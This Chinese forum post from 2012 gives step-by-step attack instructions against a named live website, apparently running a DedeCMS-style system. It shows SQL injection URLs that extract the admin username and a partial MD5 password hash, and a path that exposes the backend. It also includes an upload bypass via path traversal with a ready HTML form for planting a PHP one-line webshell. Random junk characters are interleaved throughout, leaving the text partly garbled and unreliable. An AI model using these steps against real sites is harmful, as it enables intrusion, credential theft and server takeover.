①注入漏洞。
2 n$ r( f% M& F1 G1 I* `6 R9 q这站 http://www.political-security.com/7 y* K2 t, {0 D9 S( O( M9 W: P2 z
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,' b+ r# k. T; ^4 _$ Y; k
www.political-security.com/data/mysql_error_trace.inc 爆后台/ P( N- d. W S2 B( |7 U9 X+ H
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
. |# K2 P( l6 \然后写上语句 & d4 L9 G( y9 `7 b
查看管理员帐号
9 Z v2 Q# t t" k3 O0 P6 {! U shttp://www.political-security.co ... &membergroup=@`$ u" o) i5 N4 g/ ?
0 J0 P' \& @$ h4 radmin 5 `& }3 J& J2 b
. m1 M. N+ W, \查看管理员密码
$ S5 M3 R, z8 @ http://www.political-security.co ... &membergroup=@`
6 x: A# M2 e S* o+ ^- M& \
! i0 \; H4 b. q0 N; H f8d29b1ef9f8c5a5af4297 ?) L. n- q: S% M& N" _; D
+ H/ E, K* i0 a; K: {
查看管理员密码5 Q" w1 G& ], L) H
8 n5 F& T7 A% j7 j% [2 ~
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
4 s R6 `% g: h( G
1 A2 `# n5 m! Z& ?8 G/ S( k8d2
# k5 A0 ^4 g) S& l9b1ef9f8c5a5af42
; c7 o0 M+ P% q' F$ `4 w9
( {- j% z$ F Z G, [2 G i$ C3 F* c* i4 v7 w& i( T
cmd5没解出来 只好测试第二个方法
9 V3 b' M6 T- N& t8 K ^ ?2 a8 F2 h5 j( } q
9 L6 O: a% S; Q- `& e4 [! ~$ P
②上传漏洞:& ^" c; L1 x# }: D+ _3 p9 q C: Q
- L- K* J; m Z5 S8 s' w3 N1 G
只要登陆会员中心,然后访问页面链接
, ^' G# `- Q9 W" ^“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”$ E+ H8 g8 K9 d) n
# i3 |/ d! p! ]$ U1 m1 }" ^! {/ p0 g如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”8 j4 N2 K8 n t1 _/ ^
7 W r0 {3 _. {. j* Q, V" [" `/ S3 b
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
: G6 s @+ t' w1 J, {8 u
6 f( \) u( q8 `: G* U<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
0 K: C% T) g7 i3 O# D) \或者2 p/ I2 V2 Z7 `
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对